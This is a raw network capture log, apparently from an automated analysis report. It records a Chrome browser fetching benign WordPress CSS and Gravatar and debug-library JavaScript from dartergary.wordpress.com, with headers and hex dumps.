                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 57 65 62 6b 69 74 41 70 70 65 61 72 61 6e 63 65 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 28 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 66 69 72 65 62 75 67 7c 7c 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 65 78 63 65 70 74 69 6f 6e 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 74 61 62 6c 65 29 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 61 76 69 67
                                                                                                                                                                                                                                                                  Data Ascii: ent&&document.documentElement&&document.documentElement.style&&document.documentElement.style.WebkitAppearance||"undefined"!=typeof window&&window.console&&(window.console.firebug||window.console.exception&&window.console.table)||"undefined"!=typeof navig
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 30 39 39 22 2c 22 23 46 46 30 30 43 43 22 2c 22 23 46 46 30 30 46 46 22 2c 22 23 46 46 33 33 30 30 22 2c 22 23 46 46 33 33 33 33 22 2c 22 23 46 46 33 33 36 36 22 2c 22 23 46 46 33 33 39 39 22 2c 22 23 46 46 33 33 43 43 22 2c 22 23 46 46 33 33 46 46 22 2c 22 23 46 46 36 36 30 30 22 2c 22 23 46 46 36 36 33 33 22 2c 22 23 46 46 39 39 30 30 22 2c 22 23 46 46 39 39 33 33 22 2c 22 23 46 46 43 43 30 30 22 2c 22 23 46 46 43 43 33 33 22 5d 2c 74 2e 6c 6f 67 3d 63 6f 6e 73 6f 6c 65 2e 64 65 62 75 67 7c 7c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 7c 7c 28 28 29 3d 3e 7b 7d 29 2c 65 2e 65 78 70 6f 72 74 73 3d 6e 28 33 32 31 32 29 28 74 29 3b 63 6f 6e 73 74 7b 66 6f 72 6d 61 74 74 65 72 73 3a 72 7d 3d 65 2e 65 78 70 6f 72 74 73 3b 72 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                                                                                  Data Ascii: 099","#FF00CC","#FF00FF","#FF3300","#FF3333","#FF3366","#FF3399","#FF33CC","#FF33FF","#FF6600","#FF6633","#FF9900","#FF9933","#FFCC00","#FFCC33"],t.log=console.debug||console.log||(()=>{}),e.exports=n(3212)(t);const{formatters:r}=e.exports;r.j=function(e)
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 61 63 6b 7c 7c 65 2e 6d 65 73 73 61 67 65 3b 72 65 74 75 72 6e 20 65 7d 2c 74 2e 64 69 73 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 5b 2e 2e 2e 74 2e 6e 61 6d 65 73 2e 6d 61 70 28 6f 29 2c 2e 2e 2e 74 2e 73 6b 69 70 73 2e 6d 61 70 28 6f 29 2e 6d 61 70 28 28 65 3d 3e 22 2d 22 2b 65 29 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 3b 72 65 74 75 72 6e 20 74 2e 65 6e 61 62 6c 65 28 22 22 29 2c 65 7d 2c 74 2e 65 6e 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3b 74 2e 73 61 76 65 28 65 29 2c 74 2e 6e 61 6d 65 73 70 61 63 65 73 3d 65 2c 74 2e 6e 61 6d 65 73 3d 5b 5d 2c 74 2e 73 6b 69 70 73 3d 5b 5d 3b 63 6f 6e 73 74 20 72 3d 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 22 22 29 2e 73 70 6c 69 74 28
                                                                                                                                                                                                                                                                  Data Ascii: ack||e.message;return e},t.disable=function(){const e=[...t.names.map(o),...t.skips.map(o).map((e=>"-"+e))].join(",");return t.enable(""),e},t.enable=function(e){let n;t.save(e),t.namespaces=e,t.names=[],t.skips=[];const r=("string"==typeof e?e:"").split(
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 63 6f 6e 64 73 3f 7c 73 65 63 73 3f 7c 73 7c 6d 69 6e 75 74 65 73 3f 7c 6d 69 6e 73 3f 7c 6d 7c 68 6f 75 72 73 3f 7c 68 72 73 3f 7c 68 7c 64 61 79 73 3f 7c 64 7c 77 65 65 6b 73 3f 7c 77 7c 79 65 61 72 73 3f 7c 79 72 73 3f 7c 79 29 3f 24 2f 69 2e 65 78 65 63 28 65 29 3b 69 66 28 21 69 29 72 65 74 75 72 6e 3b 76 61 72 20 63 3d 70 61 72 73 65 46 6c 6f 61 74 28 69 5b 31 5d 29 3b 73 77 69 74 63 68 28 28 69 5b 32 5d 7c 7c 22 6d 73 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 61 73 65 22 79 65 61 72 73 22 3a 63 61 73 65 22 79 65 61 72 22 3a 63 61 73 65 22 79 72 73 22 3a 63 61 73 65 22 79 72 22 3a 63 61 73 65 22 79 22 3a 72 65 74 75 72 6e 20 63 2a 61 3b 63 61 73 65 22 77 65 65 6b 73 22 3a 63 61 73 65 22 77 65 65 6b 22 3a 63 61 73 65 22 77 22 3a 72 65
                                                                                                                                                                                                                                                                  Data Ascii: conds?|secs?|s|minutes?|mins?|m|hours?|hrs?|h|days?|d|weeks?|w|years?|yrs?|y)?$/i.exec(e);if(!i)return;var c=parseFloat(i[1]);switch((i[2]||"ms").toLowerCase()){case"years":case"year":case"yrs":case"yr":case"y":return c*a;case"weeks":case"week":case"w":re
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 69 29 3b 69 66 28 6f 29 61 28 22 28 25 73 29 20 46 6c 75 73 68 69 6e 67 20 25 6f 20 74 6f 6b 65 6e 22 2c 63 2c 69 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 69 29 3b 65 6c 73 65 20 74 72 79 7b 69 66 28 75 29 7b 69 66 28 64 3d 61 77 61 69 74 20 4a 53 4f 4e 2e 70 61 72 73 65 28 75 29 2c 64 26 26 64 2e 65 78 70 69 72 65 3e 44 61 74 65 2e 6e 6f 77 28 29 29 72 65 74 75 72 6e 20 61 28 22 28 25 73 29 20 50 72 6f 76 69 64 69 6e 67 20 25 6f 20 74 6f 6b 65 6e 20 66 72 6f 6d 20 74 68 65 20 73 74 6f 72 65 22 2c 63 2c 69 29 2c 64 2e 64 61 74 61 3b 61 28 22 28 25 73 29 20 54 6f 6b 65 6e 20 25 6f 20 65 78 70 69 72 65 64 2e 20 43 6c 65 61 6e 2e 22 2c 63 2c 69 29 2c 6c 6f 63 61 6c 53 74
                                                                                                                                                                                                                                                                  Data Ascii: lStorage.getItem(i);if(o)a("(%s) Flushing %o token",c,i),localStorage.removeItem(i);else try{if(u){if(d=await JSON.parse(u),d&&d.expire>Date.now())return a("(%s) Providing %o token from the store",c,i),d.data;a("(%s) Token %o expired. Clean.",c,i),localSt


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.1649710192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC629OUTGET /wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC443INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css
                                                                                                                                                                                                                                                                  Content-Length: 311
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/471-1684460928880.9634
                                                                                                                                                                                                                                                                  Expires: Fri, 30 May 2025 20:23:30 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw BYPASS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC311INData Raw: 69 6d 67 2e 6c 61 74 65 78 7b 62 6f 72 64 65 72 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 76 69 64 65 6f 2d 70 6c 61 79 65 72 7b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 31 30 30 30 65 6d 7d 2e 63 6f 6d 6d 65 6e 74 20 6f 62 6a 65 63 74 2c 2e 63 6f 6d 6d 65 6e 74 20 65 6d 62 65 64 2c 2e 65 6d 62 65 64 2d 76 69 6d 65 6f 20 69 66 72 61 6d 65 2c 2e 65 6d 62 65 64 2d 79 6f 75 74
                                                                                                                                                                                                                                                                  Data Ascii: img.latex{border:0;vertical-align:middle}.video-player{border:0;margin:auto;padding:5px;text-align:center;max-width:100%}.hidden{display:none}.screen-reader-text{position:absolute;left:-1000em}.comment object,.comment embed,.embed-vimeo iframe,.embed-yout


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  6192.168.2.1649712192.0.73.24437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC628OUTGET /js/hovercards/hovercards.min.js?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 0.gravatar.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 13581
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 24 Sep 2024 13:56:26 GMT
                                                                                                                                                                                                                                                                  ETag: "66f2c50a-350d"
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                                  Expires: Tue, 05 Nov 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=604800
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC930INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 72 65 74 75 72 6e 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 74 28 72 29 7d
                                                                                                                                                                                                                                                                  Data Ascii: !function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 67 52 69 67 68 74 22 2c 72 69 67 68 74 3a 22 70 61 64 64 69 6e 67 4c 65 66 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 72 3d 7b 22 26 22 3a 22 26 61 6d 70 3b 22 2c 22 3c 22 3a 22 26 6c 74 3b 22 2c 22 3e 22 3a 22 26 67 74 3b 22 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 2c 22 60 22 3a 22 26 23 78 36 30 3b 22 7d 3b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 26 28 61 6d 70 7c 6c 74 7c 67 74 7c 71 75 6f 74 7c 23 33 39 7c 78 36 30 29 3b 7c 5b 5c 26 3c 3e 22 27 60 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 26 22 3d 3d 3d 74 5b 30 5d 3f 74 3a 72 5b 74 5d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 72 65 74 75 72 6e 20 65 6e 63 6f 64 65 55 52 49 28 74 29 7d 66
                                                                                                                                                                                                                                                                  Data Ascii: gRight",right:"paddingLeft"};function e(t){var r={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;","`":"&#x60;"};return t.replace(/&(amp|lt|gt|quot|#39|x60);|[\&<>"'`]/g,(function(t){return"&"===t[0]?t:r[t]}))}function v(t){return encodeURI(t)}f
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 70 28 61 2c 74 29 7d 29 29 2c 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 6d 28 61 2c 74 29 7d 29 29 7d 29 29 29 7d 2c 74 68 69 73 2e 64 65 74 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 69 2e 6c 65 6e 67 74 68 26 26 28 72 2e 69 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 74 2e 72 65 66 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73
                                                                                                                                                                                                                                                                  Data Ascii: ((function(t){t.ref.addEventListener("mouseenter",(function(a){return r.p(a,t)})),t.ref.addEventListener("mouseleave",(function(a){return r.m(a,t)}))})))},this.detach=function(){r.i.length&&(r.i.forEach((function(t){var a=t.ref;a.removeEventListener("mous
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 2c 72 65 66 3a 6e 2e 43 28 74 29 7c 7c 74 7d 7d 29 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2c 74 68 69 73 2e 69 7d 2c 72 2e 46 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 6e 3d 72 2e 69 64 2c 69 3d 72 2e 68 61 73 68 2c 65 3d 72 2e 70 61 72 61 6d 73 2c 76 3d 72 2e 72 65 66 2c 6c 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6e 29 29 7b 76 61 72 20 72 3b 69 66 28 61 2e 75 2e 68 61 73 28 69 29 29 7b 76 61 72 20 6c 3d 61 2e 75 2e 67 65 74 28 69 29 3b 72 3d 74 2e 63 72 65 61 74 65 48 6f 76 65 72 63 61 72 64 28 73 28 7b 7d 2c 6c 2c 7b 61 76 61 74 61 72 55 72 6c 3a 6c 2e 61 76 61 74 61 72 55 72 6c 2b 65 7d 29 2c 7b 61 64 64 69 74 69 6f
                                                                                                                                                                                                                                                                  Data Ascii: ,ref:n.C(t)||t}})).filter(Boolean),this.i},r.F=function(r){var a=this,n=r.id,i=r.hash,e=r.params,v=r.ref,l=setTimeout((function(){if(!d.getElementById(n)){var r;if(a.u.has(i)){var l=a.u.get(i);r=t.createHovercard(s({},l,{avatarUrl:l.avatarUrl+e}),{additio
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 3b 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 65 72 72 6f 72 22 29 2c 72 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 22 29 2c 72 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 28 76 29 2c 61 2e 42 28 69 2c 7b 63 6f 64 65 3a 6e 2c 6d 65 73 73 61 67 65 3a 6f 7d 29 7d 29 29 3b 72 2e 69 64 3d 6e 2c 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 61 2e 6c 2e 67 65 74 28 6e 29 29 7d 29 29 2c 72 2e 61 64 64 45 76
                                                                                                                                                                                                                                                                  Data Ascii: stElementChild;r.classList.add("gravatar-hovercard--error"),r.classList.remove("gravatar-hovercard--skeleton"),r.replaceChildren(v),a.B(i,{code:n,message:o})}));r.id=n,r.addEventListener("mouseenter",(function(){return clearInterval(a.l.get(n))})),r.addEv
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 29 3b 61 26 26 28 61 2e 72 65 6d 6f 76 65 28 29 2c 72 2e 52 28 74 2c 61 29 29 7d 29 2c 74 68 69 73 2e 48 29 3b 74 68 69 73 2e 6c 2e 73 65 74 28 74 2c 61 29 7d 2c 72 2e 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 7c 7c 28 74 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 6c 2e 67 65 74 28 72 2e 69 64 29 29 2c 74 68 69 73 2e 46 28 72 29 29 7d 2c 72 2e 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 61 3d 72 2e 69
                                                                                                                                                                                                                                                                  Data Ascii: ){var r=this,a=setTimeout((function(){var a=d.getElementById(t);a&&(a.remove(),r.R(t,a))}),this.H);this.l.set(t,a)},r.p=function(t,r){"ontouchstart"in d||(t.stopImmediatePropagation(),clearInterval(this.l.get(r.id)),this.F(r))},r.m=function(t,r){var a=r.i
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 22 20 73 72 63 3d 22 27 2b 76 28 75 29 2b 27 22 20 77 69 64 74 68 3d 22 37 32 22 20 68 65 69 67 68 74 3d 22 37 32 22 20 61 6c 74 3d 22 27 2b 6a 2b 27 22 20 2f 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 3c 2f 61 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 3c 61 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 65 72 73 6f 6e 61 6c 2d 69 6e 66 6f 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 27 2b 6b 2b 27 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 68 34 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 6e 61 6d 65 22 3e 27 2b 6a 2b 22 3c 2f 68 34 3e
                                                                                                                                                                                                                                                                  Data Ascii: class="gravatar-hovercard__avatar" src="'+v(u)+'" width="72" height="72" alt="'+j+'" />\n\t\t\t\t\t</a>\n\t\t\t\t\t<a class="gravatar-hovercard__personal-info-link" href="'+k+'" target="_blank">\n\t\t\t\t\t\t<h4 class="gravatar-hovercard__name">'+j+"</h4>
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 6f 66 69 6c 65 22 3a 22 56 69 65 77 20 70 72 6f 66 69 6c 65 22 29 2b 27 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 2f 73 70 61 6e 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 73 76 67 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 39 2e 31 36 36 36 36 20 31 32 2e 31 36 36 37 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 32 2e 36 36 36 36 36 20 38 2e 33 33 33 33 38 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 39 2e 31 36 36 36 36
                                                                                                                                                                                                                                                                  Data Ascii: ofile":"View profile")+'\n\t\t\t\t\t\t</span>\n\t\t\t\t\t\t<svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">\n\t\t\t\t\t\t\t<path d="M12.6667 8.33338L9.16666 12.1667M12.6667 8.33338L2.66666 8.33338M12.6667 8.33338L9.16666
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 74 2b 27 22 20 77 69 64 74 68 3d 22 37 32 22 20 68 65 69 67 68 74 3d 22 37 32 22 20 61 6c 74 3d 22 27 2b 6f 2b 27 22 20 2f 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 3c 69 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3e 27 2b 72 2b 22 3c 2f 69 3e 5c 6e 5c 74 5c 74 5c 74 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 5c 74 22 2c 76 7d 3b 76 61 72 20 75 2c 68 3d 69 2e 53 2c 66 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 45 6c 22 3a 7b 22 68 22 3a 22 5e 30 2e 39 2e 31 22 7d 7d 27 29 3b 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61
                                                                                                                                                                                                                                                                  Data Ascii: t+'" width="72" height="72" alt="'+o+'" />\n\t\t\t\t<i class="gravatar-hovercard__error-message">'+r+"</i>\n\t\t\t</div>\n \t",v};var u,h=i.S,f=JSON.parse('{"El":{"h":"^0.9.1"}}');function g(t,r){var a=Object.keys(t);if(Object.getOwnPropertySymbols){va
